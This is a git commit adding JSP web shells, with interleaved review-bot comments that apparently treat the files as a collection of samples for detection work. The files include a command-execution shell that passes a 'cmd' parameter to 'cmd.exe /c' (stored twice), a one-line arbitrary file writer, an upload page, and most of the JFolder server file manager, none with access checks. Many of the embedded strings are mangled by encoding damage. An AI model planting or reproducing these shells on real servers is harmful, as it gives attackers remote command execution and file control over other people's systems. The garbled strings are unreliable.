php shell and jsp shell
tennc 2013-09-13 10:44:57 +08:00
parent 5ba51580de
commit df6d55ad4f
29 changed files with 7756 additions and 0 deletions

3312
jsp/0000.jsp Normal file

File diff suppressed because it is too large Load diff

31
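--- a/jsp/1.jsp
+++ b/jsp/1.jsp
@@ -0,0 +1,31 @@
+<%@ page import="java.util.*,java.io.*,java.net.*"%>
+<%
+//
+// JSP_KIT
+//
+// cmd.jsp = Command Execution (win32)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+<HTML><BODY>
+<FORM METHOD="POST" NAME="myform" ACTION="">
+<INPUT TYPE="text" NAME="cmd">
+<INPUT TYPE="submit" VALUE="Send">
+</FORM>
+<pre>
+<%
+if (request.getParameter("cmd") != null) {
+out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
+Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
+OutputStream os = p.getOutputStream();
+InputStream in = p.getInputStream();
+DataInputStream dis = new DataInputStream(in);
+String disr = dis.readLine();
+while ( disr != null ) {
+out.println(disr); disr = dis.readLine(); }
+}
+%>
+</pre>
+</BODY></HTML>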
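Review bot: Nothing stored with `jsp/1.jsp` says that it is a collected web-shell sample or what to look for when hunting it; the only header is the original kit banner (`cmd.jsp = Command Execution (win32)`). I would record that in a sidecar note or README entry rather than in the file, so the sample's bytes stay unchanged, for example `jsp/1.jsp: command-execution web shell; request parameter "cmd" is concatenated into Runtime.getRuntime().exec("cmd.exe /c " + ...) with no access check`. That gives a detection author the exact source-to-sink pair to key on without reading every sample. The visible lines of `jsp/102.jsp` are identical, and `jsp/IXRbE.jsp` and `jsp/IXRbE02.jsp` carry no description at all, so the same applies to them.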

31
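--- a/jsp/102.jsp
+++ b/jsp/102.jsp
@@ -0,0 +1,31 @@
+<%@ page import="java.util.*,java.io.*,java.net.*"%>
+<%
+//
+// JSP_KIT
+//
+// cmd.jsp = Command Execution (win32)
+//
+// by: Unknown
+// modified: 27/06/2003
+//
+%>
+<HTML><BODY>
+<FORM METHOD="POST" NAME="myform" ACTION="">
+<INPUT TYPE="text" NAME="cmd">
+<INPUT TYPE="submit" VALUE="Send">
+</FORM>
+<pre>
+<%
+if (request.getParameter("cmd") != null) {
+out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
+Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
+OutputStream os = p.getOutputStream();
+InputStream in = p.getInputStream();
+DataInputStream dis = new DataInputStream(in);
+String disr = dis.readLine();
+while ( disr != null ) {
+out.println(disr); disr = dis.readLine(); }
+}
+%>
+</pre>
+</BODY></HTML>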

47
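--- a/jsp/12302.jsp
+++ b/jsp/12302.jsp
@@ -0,0 +1,47 @@
+<%@page contentType="text/html;charset=gb2312"%>
+<%@page import="java.io.*,java.util.*,java.net.*"%>
+<html>
+<head>
+<title>JspDo Code By Xiao.3</title>
+<style type="text/css">
+body { color:red; font-size:12px; background-color:white; }
+</style>
+</head>
+<body>
+<%
+if(request.getParameter("context")!=null)
+{
+String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"gb2312");
+String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"gb2312");
+OutputStream pt = null;
+try {
+pt = new FileOutputStream(path);
+pt.write(context.getBytes());
+out.println("<a href='"+request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+request.getRequestURI()+"'><font color='red' title='????????????è????°???????????????é??é??!'>????????????!</font></a>");
+} catch (FileNotFoundException ex2) {
+out.println("<font color='red'>???????¤±è??!</font>");
+} catch (IOException ex) {
+out.println("<font color='red'>???????¤±è??!</font>");
+} finally {
+try {
+pt.close();
+} catch (IOException ex3) {
+out.println("<font color='red'>???????¤±è??!</font>");
+}
+}
+}
+%>
+<form name="frmUpload" method="post" action="">
+<font color="blue">????????????è·????:</font><%out.print(request.getRealPath(request.getServletPath())); %>
+<br>
+<br>
+<font color="blue">????????????è·????:</font><input type="text" size="70" name="path" value="<%out.print(getServletContext().getRealPath("/")); %>">
+<br>
+<br>
+??????????????????:<textarea name="context" id="context" style="width: 51%; height: 150px;"></textarea>
+<br>
+<br>
+<input type="submit" name="btnSubmit" value="Upload">
+</form>
+</body>
+</html>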
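Review bot: The user-facing strings in this file were committed as runs of `?` mixed with stray Latin-1 characters (the `title=` attribute, the three `out.println("<font color='red'>…")` messages in the scriptlet, and the form labels below it), although the page declares `charset=gb2312`. Unless this is only an artefact of how the page renders, the bytes were transcoded before the commit, so the stored sample probably no longer matches the file as originally collected and hashes or string signatures derived from it will not match the original. Re-add the file from the original bytes and stop the repository from converting it, for example with `*.jsp -text` in `.gitattributes`. `jsp/data.jsp` and the visible part of `jsp/data02.jsp` show the same damage in their comments and string tables.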

1
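--- a/jsp/IXRbE.jsp
+++ b/jsp/IXRbE.jsp
@@ -0,0 +1 @@
+<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>xIXRbE.jspx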
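Review bot: `jsp/IXRbE02.jsp` is the same single line as this file, and `jsp/102.jsp` repeats `jsp/1.jsp` line for line, so the commit stores several samples twice under different names. Duplicates inflate the collection and make per-file counts of signature coverage misleading. Keep one copy per distinct content and list the other observed names in an index keyed by hash, e.g. `<sha256-placeholder>  jsp/IXRbE.jsp  (also seen as IXRbE02.jsp)`. The fixed text `xIXRbE.jspx` after the scriptlet is emitted in every response and is worth recording in that index as a string indicator for this one-line file writer.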

1
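--- a/jsp/IXRbE02.jsp
+++ b/jsp/IXRbE02.jsp
@@ -0,0 +1 @@
+<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>xIXRbE.jspx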

993
jsp/data.jsp Normal file

@ -0,0 +1,993 @@
<%
/**
JFolder V0.9 windows platform
@Filename?? JFolder.jsp
@Description?? ?????ò???????????????????????ò???à????×??????í?÷???á???ù±?????????×÷????????????????
@Bugs : ?????±??????????????·¨????????
*/
%>
<%@ page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*" %>
<%!
private final static int languageNo=0; //????°?±???0 : ?????? 1??????
String strThisFile="JFolder.jsp";
String[] authorInfo={" <font color=red> °??????ú </font>"," <font color=red> Thanks for your support - - by Steven Cee http://www.topronet.com </font>"};
String[] strFileManage = {"?? ?? ?? ?í","File Management"};
String[] strCommand = {"CMD ?ü ??","Command Window"};
String[] strSysProperty = {"?? ?? ?? ??","System Property"};
String[] strHelp = {"°? ?ú","Help"};
String[] strParentFolder = {"????????","Parent Folder"};
String[] strCurrentFolder= {"?±?°????","Current Folder"};
String[] strDrivers = {"?????÷","Drivers"};
String[] strFileName = {"????????","File Name"};
String[] strFileSize = {"?????ó??","File Size"};
String[] strLastModified = {"×??ó????","Last Modified"};
String[] strFileOperation= {"??????×÷","Operations"};
String[] strFileEdit = {"????","Edit"};
String[] strFileDown = {"????","Download"};
String[] strFileCopy = {"????","Move"};
String[] strFileDel = {"????","Delete"};
String[] strExecute = {"????","Execute"};
String[] strBack = {"·???","Back"};
String[] strFileSave = {"±???","Save"};
public class FileHandler
{
private String strAction="";
private String strFile="";
void FileHandler(String action,String f)
{
}
}
public static class UploadMonitor {
static Hashtable uploadTable = new Hashtable();
static void set(String fName, UplInfo info) {
uploadTable.put(fName, info);
}
static void remove(String fName) {
uploadTable.remove(fName);
}
static UplInfo getInfo(String fName) {
UplInfo info = (UplInfo) uploadTable.get(fName);
return info;
}
}
public class UplInfo {
public long totalSize;
public long currSize;
public long starttime;
public boolean aborted;
public UplInfo() {
totalSize = 0l;
currSize = 0l;
starttime = System.currentTimeMillis();
aborted = false;
}
public UplInfo(int size) {
totalSize = size;
currSize = 0;
starttime = System.currentTimeMillis();
aborted = false;
}
public String getUprate() {
long time = System.currentTimeMillis() - starttime;
if (time != 0) {
long uprate = currSize * 1000 / time;
return convertFileSize(uprate) + "/s";
}
else return "n/a";
}
public int getPercent() {
if (totalSize == 0) return 0;
else return (int) (currSize * 100 / totalSize);
}
public String getTimeElapsed() {
long time = (System.currentTimeMillis() - starttime) / 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
public String getTimeEstimated() {
if (currSize == 0) return "n/a";
long time = System.currentTimeMillis() - starttime;
time = totalSize * time / currSize;
time /= 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
}
public class FileInfo {
public String name = null, clientFileName = null, fileContentType = null;
private byte[] fileContents = null;
public File file = null;
public StringBuffer sb = new StringBuffer(100);
public void setFileContents(byte[] aByteArray) {
fileContents = new byte[aByteArray.length];
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
}
}
// A Class with methods used to process a ServletInputStream
public class HttpMultiPartParser {
private final String lineSeparator = System.getProperty("line.separator", "\n");
private final int ONE_MB = 1024 * 1;
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
int clength) throws IllegalArgumentException, IOException {
if (is == null) throw new IllegalArgumentException("InputStream");
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
"\"" + boundary + "\" is an illegal boundary indicator");
boundary = "--" + boundary;
StringTokenizer stLine = null, stFields = null;
FileInfo fileInfo = null;
Hashtable dataTable = new Hashtable(5);
String line = null, field = null, paramName = null;
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
boolean isFile = false;
if (saveFiles) { // Create the required directory (including parent dirs)
File f = new File(saveInDir);
f.mkdirs();
}
line = getLine(is);
if (line == null || !line.startsWith(boundary)) throw new IOException(
"Boundary not found; boundary = " + boundary + ", line = " + line);
while (line != null) {
if (line == null || !line.startsWith(boundary)) return dataTable;
line = getLine(is);
if (line == null) return dataTable;
stLine = new StringTokenizer(line, ";\r\n");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
line = stLine.nextToken().toLowerCase();
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
"Bad data in second line");
stFields = new StringTokenizer(stLine.nextToken(), "=\"");
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
fileInfo = new FileInfo();
stFields.nextToken();
paramName = stFields.nextToken();
isFile = false;
if (stLine.hasMoreTokens()) {
field = stLine.nextToken();
stFields = new StringTokenizer(field, "=\"");
if (stFields.countTokens() > 1) {
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
fileInfo.name = paramName;
String value = stFields.nextToken();
if (value != null && value.trim().length() > 0) {
fileInfo.clientFileName = value;
isFile = true;
}
else {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
}
else if (field.toLowerCase().indexOf("filename") >= 0) {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
boolean skipBlankLine = true;
if (isFile) {
line = getLine(is);
if (line == null) return dataTable;
if (line.trim().length() < 1) skipBlankLine = false;
else {
stLine = new StringTokenizer(line, ": ");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in third line");
stLine.nextToken(); // Content-Type
fileInfo.fileContentType = stLine.nextToken();
}
}
if (skipBlankLine) {
line = getLine(is);
if (line == null) return dataTable;
}
if (!isFile) {
line = getLine(is);
if (line == null) return dataTable;
dataTable.put(paramName, line);
// If parameter is dir, change saveInDir to dir
if (paramName.equals("dir")) saveInDir = line;
line = getLine(is);
continue;
}
try {
UplInfo uplInfo = new UplInfo(clength);
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
OutputStream os = null;
String path = null;
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
fileInfo.clientFileName));
else os = new ByteArrayOutputStream(ONE_MB);
boolean readingContent = true;
byte previousLine[] = new byte[2 * ONE_MB];
byte temp[] = null;
byte currentLine[] = new byte[2 * ONE_MB];
int read, read3;
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
line = null;
break;
}
while (readingContent) {
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
line = null;
uplInfo.aborted = true;
break;
}
if (compareBoundary(boundary, currentLine)) {
os.write(previousLine, 0, read - 2);
line = new String(currentLine, 0, read3);
break;
}
else {
os.write(previousLine, 0, read);
uplInfo.currSize += read;
temp = currentLine;
currentLine = previousLine;
previousLine = temp;
read = read3;
}//end else
}//end while
os.flush();
os.close();
if (!saveFiles) {
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
fileInfo.setFileContents(baos.toByteArray());
}
else fileInfo.file = new File(path);
dataTable.put(paramName, fileInfo);
uplInfo.currSize = uplInfo.totalSize;
}//end try
catch (IOException e) {
throw e;
}
}
return dataTable;
}
/**
* Compares boundary string to byte array
*/
private boolean compareBoundary(String boundary, byte ba[]) {
byte b;
if (boundary == null || ba == null) return false;
for (int i = 0; i < boundary.length(); i++)
if ((byte) boundary.charAt(i) != ba[i]) return false;
return true;
}
/** Convenience method to read HTTP header lines */
private synchronized String getLine(ServletInputStream sis) throws IOException {
byte b[] = new byte[1024];
int read = sis.readLine(b, 0, b.length), index;
String line = null;
if (read != -1) {
line = new String(b, 0, read);
if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
}
return line;
}
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
String path = null;
if (dir == null || fileName == null) throw new IllegalArgumentException(
"dir or fileName is null");
int index = fileName.lastIndexOf('/');
String name = null;
if (index >= 0) name = fileName.substring(index + 1);
else name = fileName;
index = name.lastIndexOf('\\');
if (index >= 0) fileName = name.substring(index + 1);
path = dir + File.separator + fileName;
if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
else return path.replace('/', File.separatorChar);
}
} //End of class HttpMultiPartParser
String formatPath(String p)
{
StringBuffer sb=new StringBuffer();
for (int i = 0; i < p.length(); i++)
{
if(p.charAt(i)=='\\')
{
sb.append("\\\\");
}
else
{
sb.append(p.charAt(i));
}
}
return sb.toString();
}
/**
* Converts some important chars (int) to the corresponding html string
*/
static String conv2Html(int i) {
if (i == '&') return "&amp;";
else if (i == '<') return "&lt;";
else if (i == '>') return "&gt;";
else if (i == '"') return "&quot;";
else return "" + (char) i;
}
/**
* Converts a normal string to a html conform string
*/
static String htmlEncode(String st) {
StringBuffer buf = new StringBuffer();
for (int i = 0; i < st.length(); i++) {
buf.append(conv2Html(st.charAt(i)));
}
return buf.toString();
}
String getDrivers()
/**
Windows?????????????????ù????????
*/
{
StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
File roots[]=File.listRoots();
for(int i=0;i<roots.length;i++)
{
sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
sb.append(roots[i]+"</a>&nbsp;");
}
return sb.toString();
}
static String convertFileSize(long filesize)
{
//bug 5.09M ????5.9M
String strUnit="Bytes";
String strAfterComma="";
int intDivisor=1;
if(filesize>=1024*1024)
{
strUnit = "MB";
intDivisor=1024*1024;
}
else if(filesize>=1024)
{
strUnit = "KB";
intDivisor=1024;
}
if(intDivisor==1) return filesize + " " + strUnit;
strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
if(strAfterComma=="") strAfterComma=".0";
return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
}
%>
<%
request.setCharacterEncoding("gb2312");
String tabID = request.getParameter("tabID");
String strDir = request.getParameter("path");
String strAction = request.getParameter("action");
String strFile = request.getParameter("file");
String strPath = strDir + "\\" + strFile;
String strCmd = request.getParameter("cmd");
StringBuffer sbEdit=new StringBuffer("");
StringBuffer sbDown=new StringBuffer("");
StringBuffer sbCopy=new StringBuffer("");
StringBuffer sbSaveCopy=new StringBuffer("");
StringBuffer sbNewFile=new StringBuffer("");
if((tabID==null) || tabID.equals(""))
{
tabID = "1";
}
if(strDir==null||strDir.length()<1)
{
strDir = request.getRealPath("/");
}
if(strAction!=null && strAction.equals("down"))
{
File f=new File(strPath);
if(f.length()==0)
{
sbDown.append("?????ó???? 0 ×???????????????°?");
}
else
{
response.setHeader("content-type","text/html; charset=ISO-8859-1");
response.setContentType("APPLICATION/OCTET-STREAM");
response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
out.clearBuffer();
int i;
while ((i=fileInputStream.read()) != -1)
{
out.write(i);
}
fileInputStream.close();
out.close();
}
}
if(strAction!=null && strAction.equals("del"))
{
File f=new File(strPath);
f.delete();
}
if(strAction!=null && strAction.equals("edit"))
{
File f=new File(strPath);
BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
sbEdit.append("<input type=hidden name=action value=save >\r\n");
sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> &nbsp;"+strPath+"\r\n");
sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
String line="";
while((line=br.readLine())!=null)
{
sbEdit.append(htmlEncode(line)+"\r\n");
}
sbEdit.append("</textarea>");
sbEdit.append("<input type=hidden name=path value="+strDir+">");
sbEdit.append("</form>");
}
if(strAction!=null && strAction.equals("save"))
{
File f=new File(strPath);
BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
String strContent=request.getParameter("content");
bw.write(strContent);
bw.close();
}
if(strAction!=null && strAction.equals("copy"))
{
File f=new File(strPath);
sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
sbCopy.append("?????????? "+strPath+"<p>");
sbCopy.append("??±ê?????? <input type=text name=file2 size=40 value='"+strDir+"'><p>");
sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p>&nbsp;\r\n");
sbCopy.append("</form>");
}
if(strAction!=null && strAction.equals("savecopy"))
{
File f=new File(strPath);
String strDesFile=request.getParameter("file2");
if(strDesFile==null || strDesFile.equals(""))
{
sbSaveCopy.append("<p><font color=red>??±ê?????í?ó??</font>");
}
else
{
File f_des=new File(strDesFile);
if(f_des.isFile())
{
sbSaveCopy.append("<p><font color=red>??±ê??????????,??????????</font>");
}
else
{
String strTmpFile=strDesFile;
if(f_des.isDirectory())
{
if(!strDesFile.endsWith("\\"))
{
strDesFile=strDesFile+"\\";
}
strTmpFile=strDesFile+"cqq_"+strFile;
}
File f_des_copy=new File(strTmpFile);
FileInputStream in1=new FileInputStream(f);
FileOutputStream out1=new FileOutputStream(f_des_copy);
byte[] buffer=new byte[1024];
int c;
while((c=in1.read(buffer))!=-1)
{
out1.write(buffer,0,c);
}
in1.close();
out1.close();
sbSaveCopy.append("???????? ??"+strPath+"<p>");
sbSaveCopy.append("??±ê???? ??"+strTmpFile+"<p>");
sbSaveCopy.append("<font color=red>??????????</font>");
}
}
sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=·???>");
}
if(strAction!=null && strAction.equals("newFile"))
{
String strF=request.getParameter("fileName");
String strType1=request.getParameter("btnNewFile");
String strType2=request.getParameter("btnNewDir");
String strType="";
if(strType1==null)
{
strType="Dir";
}
else if(strType2==null)
{
strType="File";
}
if(!strType.equals("") && !(strF==null || strF.equals("")))
{
File f_new=new File(strF);
if(strType.equals("File") && !f_new.createNewFile())
sbNewFile.append(strF+" ???????¨?§°?");
if(strType.equals("Dir") && !f_new.mkdirs())
sbNewFile.append(strF+" ???????¨?§°?");
}
else
{
sbNewFile.append("<p><font color=red>?¨???????ò???????í??</font>");
}
}
if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
{
String tempdir=".";
boolean error=false;
response.setContentType("text/html");
sbNewFile.append("<p><font color=red>?¨???????ò???????í??</font>");
HttpMultiPartParser parser = new HttpMultiPartParser();
int bstart = request.getContentType().lastIndexOf("oundary=");
String bound = request.getContentType().substring(bstart + 8);
int clength = request.getContentLength();
Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
if (ht.get("cqqUploadFile") != null)
{
FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
File f1 = fi.file;
UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
if (info != null && info.aborted)
{
f1.delete();
request.setAttribute("error", "Upload aborted");
}
else
{
String path = (String) ht.get("path");
if(path!=null && !path.endsWith("\\"))
path = path + "\\";
if (!f1.renameTo(new File(path + f1.getName())))
{
request.setAttribute("error", "Cannot upload file.");
error = true;
f1.delete();
}
}
}
}
%>
<html>
<head>
<style type="text/css">
td,select,input,body{font-size:9pt;}
A { TEXT-DECORATION: none }
#tablist{
padding: 5px 0;
margin-left: 0;
margin-bottom: 0;
margin-top: 0.1em;
font:9pt;
}
#tablist li{
list-style: none;
display: inline;
margin: 0;
}
#tablist li a{
padding: 3px 0.5em;
margin-left: 3px;
border: 1px solid ;
background: F6F6F6;
}
#tablist li a:link, #tablist li a:visited{
color: navy;
}
#tablist li a.current{
background: #EAEAFF;
}
#tabcontentcontainer{
width: 100%;
padding: 5px;
border: 1px solid black;
}
.tabcontent{
display:none;
}
</style>
<script type="text/javascript">
var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
////////Stop editting////////////////
function cascadedstyle(el, cssproperty, csspropertyNS){
if (el.currentStyle)
return el.currentStyle[cssproperty]
else if (window.getComputedStyle){
var elstyle=window.getComputedStyle(el, "")
return elstyle.getPropertyValue(csspropertyNS)
}
}
var previoustab=""
function expandcontent(cid, aobject){
if (document.getElementById){
highlighttab(aobject)
if (previoustab!="")
document.getElementById(previoustab).style.display="none"
document.getElementById(cid).style.display="block"
previoustab=cid
if (aobject.blur)
aobject.blur()
return false
}
else
return true
}
function highlighttab(aobject){
if (typeof tabobjlinks=="undefined")
collecttablinks()
for (i=0; i<tabobjlinks.length; i++)
tabobjlinks[i].style.backgroundColor=initTabcolor
var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
}
function collecttablinks(){
var tabobj=document.getElementById("tablist")
tabobjlinks=tabobj.getElementsByTagName("A")
}
function do_onload(){
collecttablinks()
initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
}
if (window.addEventListener)
window.addEventListener("load", do_onload, false)
else if (window.attachEvent)
window.attachEvent("onload", do_onload)
else if (document.getElementById)
window.onload=do_onload
</script>
<script language="javascript">
function doForm(action,path,file,cmd,tab,content)
{
document.frmCqq.action.value=action;
document.frmCqq.path.value=path;
document.frmCqq.file.value=file;
document.frmCqq.cmd.value=cmd;
document.frmCqq.tabID.value=tab;
document.frmCqq.content.value=content;
if(action=="del")
{
if(confirm("?·?¨?????????? "+file+" ????"))
document.frmCqq.submit();
}
else
{
document.frmCqq.submit();
}
}
</script>
<title>JSP Shell ·?°??????ú</title>
<head>
<body>
<form name="frmCqq" method="post" action="">
<input type="hidden" name="action" value="">
<input type="hidden" name="path" value="">
<input type="hidden" name="file" value="">
<input type="hidden" name="cmd" value="">
<input type="hidden" name="tabID" value="2">
<input type="hidden" name="content" value="">
</form>
<!--Top Menu Started-->
<ul id="tablist">
<li><a href="http://www.smallrain.net" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
&nbsp; <%=authorInfo[languageNo]%>
</ul>
<!--Top Menu End-->
<%
StringBuffer sbFolder=new StringBuffer("");
StringBuffer sbFile=new StringBuffer("");
try
{
File objFile = new File(strDir);
File list[] = objFile.listFiles();
if(objFile.getAbsolutePath().length()>3)
{
sbFolder.append("<tr><td >&nbsp;</td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
}
for(int i=0;i<list.length;i++)
{
if(list[i].isDirectory())
{
sbFolder.append("<tr><td >&nbsp;</td><td>");
sbFolder.append(" <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
}
else
{
String strLen="";
String strDT="";
long lFile=0;
lFile=list[i].length();
strLen = convertFileSize(lFile);
Date dt=new Date(list[i].lastModified());
strDT=dt.toLocaleString();
sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
sbFile.append(""+list[i].getName());
sbFile.append("</td><td>");
sbFile.append(""+strLen);
sbFile.append("</td><td>");
sbFile.append(""+strDT);
sbFile.append("</td><td>");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileEdit[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDel[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDown[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileCopy[languageNo]+"</a> ");
}
}
}
catch(Exception e)
{
out.println("<font color=red>??×÷?§°??? "+e.toString()+"</font>");
}
%>
<DIV id="tabcontentcontainer">
<div id="menu3" class="tabcontent">
<br>
<br> &nbsp;&nbsp; ???ê??
<br>
<br>&nbsp;
</div>
<div id="menu4" class="tabcontent">
<br>
<p>???????????÷</p>
<p>&nbsp;&nbsp;&nbsp; jsp °?±??????????í?÷???¨???????ò???????????í·????÷???????????????ú???????¨????????</p>
<p>??????????????????????????windows?????????á?????ü?????°?????????????????????????ò???à??</p>
<p>??windows??cmd??</p>
<p>&nbsp;</p>
<p>????????</p>
<p>&nbsp;&nbsp;&nbsp;<b>???ó?????????????????????????????????ò???¨?é??????????????????±??????????ò?ü???ê???????¨??<p>
???????·????<a href="http://bbs.syue.com/" target="_blank">http://bbs.syue.com/</a></b>
<p>&nbsp;</p>
<p>?????ü??????</p>
<p>&nbsp;&nbsp;&nbsp; 2004.11.15&nbsp; V0.9????°?·????????????????ù±?????????????±à?????????????????????????????°???¨????????????</p>
<p>&nbsp;&nbsp;&nbsp; 2004.10.27&nbsp; ???±?¨??0.6°?°??? ?á???????????????????? ?? cmd????</p>
<p>&nbsp;&nbsp;&nbsp; 2004.09.20&nbsp; ??????jsp&nbsp;???ò?????????ò???????????????????????ò</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
</div>
<div id="menu1" class="tabcontent">
<%
out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+"?? <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
%>
<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
<tr>
<td width="25%" align="center" valign="top">
<table width="98%" border="0" cellspacing="0" cellpadding="3">
<%=sbFolder%>
</tr>
</table>
</td>
<td width="81%" align="left" valign="top">
<%
if(strAction!=null && strAction.equals("edit"))
{
out.println(sbEdit.toString());
}
else if(strAction!=null && strAction.equals("copy"))
{
out.println(sbCopy.toString());
}
else if(strAction!=null && strAction.equals("down"))
{
out.println(sbDown.toString());
}
else if(strAction!=null && strAction.equals("savecopy"))
{
out.println(sbSaveCopy.toString());
}
else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
{
out.println(sbNewFile.toString());
}
else
{
%>
<span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
<tr bgcolor="#E7e7e6">
<td width="26%"><%=strFileName[languageNo]%></td>
<td width="19%"><%=strFileSize[languageNo]%></td>
<td width="29%"><%=strLastModified[languageNo]%></td>
<td width="26%"><%=strFileOperation[languageNo]%></td>
</tr>
<%=sbFile%>
<!-- <tr align="center">
<td colspan="4"><br>
×?????????????<font color="#FF0000">30</font> ???ó????<font color="#FF0000">664.9</font>
KB </td>
</tr>
-->
</table>
</span>
<%
}
%>
